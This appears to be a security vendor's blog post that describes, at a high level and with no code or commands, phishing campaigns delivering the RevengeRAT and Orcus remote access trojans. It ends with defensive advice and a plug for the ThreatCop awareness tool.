A threat actor has been found to leverage two of the most popular remote access trojans including RevengeRAT and Orcus RAT. These trojans are launching attacks against organizations belonging to different domains. The remote access trojans are being used by attackers to target financial services, government entities, information technology service providers as well as consultancies.
There are many variations of the infection process that are associated with the distribution of malware. Most of these attacks are being carried out through Phishing emails.
Multiple malicious campaigns actively targeting government and financial entities around the world have been spotted while backdooring their victims’ computers using Revenge and Orcus Remote Access Trojans (RAT).
What is RevengeRAT?
RevengeRAT or Revetrat is a high-risk remote access trojan. This malware is to provide cyber criminals with remote access to the infected machine and to manipulate it. Cyber attackers proliferate this infection through spam email campaigns including malicious MS Office attachments. If a trojan-type infection such as RevengeRAT is installed on your computer, then it can cause several issues.
RATs allow threat actors to remotely manipulate infected machines. Through this Trojan, attackers can manage system process, edit Windows Registry entries and hosts file, steal account credentials, log keystrokes, access hardware, execute shell commands etc.
The modifications performed to the system will affect its performance and recovery can be very difficult. Additionally, by logging keystrokes and stealing account credentials, cyber criminals can cause serious privacy issues.
Threat actors aim to generate as much revenue as possible. The stolen information can be misused in various ways either through direct money transfers, borrowing money from users’ contacts, online purchases etc.
RevengeRAT also allows the execution of shell commands that can lead to system control in various ways. Shell commands are used for causing chain infections by injecting malware into the system. RATs such as RevengeRAT are typically used for proliferating infections that have different capabilities. RevengeRAT poses a significant threat to the safety of your computer and should be eliminated immediately.
What is Orcus RAT?
Orcus is a Remote Access Trojan which is used to remotely control or access computers. Cyber attackers trick users into installing these programs and then use it to steal information.
It has the ability to disable webcam activity light, passwords retrieval from applications as well as retrieving browser cookies. It can also use microphone for recording sound, performing key logging etc. This RAT is being promoted on a hacking forum where people can purchase as well as sell malicious programs, hacks, exploits etc.
Cyber attackers use spam emails for luring people into installing this tool. These emails include attachments that, when opened and are downloaded, install Orcus.
Once installed, this tool can steal passwords and other sensitive as well as confidential details. Some of the plugins can download files including computer infections like ransomware. Installing this tool can result in issues with privacy, financial loss, computer infections as well as other serious issues.
How does this phishing attack work?
Threat actor groups behind these attacks are using fileless attack technique for gaining persistence on targeted systems and evading detection. The attackers are using SendGrid email delivery service for redirecting victims to malware distribution server which is controlled by attacker.
The adversary modified the infection process by adding ZIP archive attachments to these emails. Although these emails featured the same themes, they no longer leveraged SendGrid URLs. The attached ZIP archives consist of malicious batch files that are responsible for retrieving malicious PE32 file and executing it, in turn, infecting the systems.
These emails come from various authorities including Better Business Bureau (BBB), Ministry of Business Innovation & Employee (MBIE), Australian Competition & Consumer Commission (ACCC), as well as other regional agencies.
What can be done to evade such Phishing attacks?
It is important to keep an eye on latest technologies and emerging cyber threats; however, attackers will always figure out a way to deploy cyber-attacks.
Store and analyse logs for tracking where an infection starts and how far the organization went to remediate the infection.
Domain Protection helps in preventing phishing through automated use of email authentication and it can also protect frauds. It maintains email governance through the analysis, updating, and auctioning against the misuse of domains to send malicious email.
Organizations should ensure that cyber threat awareness as well as security best practices are carried on a regular basis. Cyber security training helps employees in building up the capability such as not clicking on links or downloading files that appear to be suspicious.
With the help of cyber security attack simulator and awareness tool ThreatCop, organizations can ensure that the employees are well prepared to fend off cyber-attacks including Phishing, Ransomware, Vishing, SMShing, Risk of removable media etc.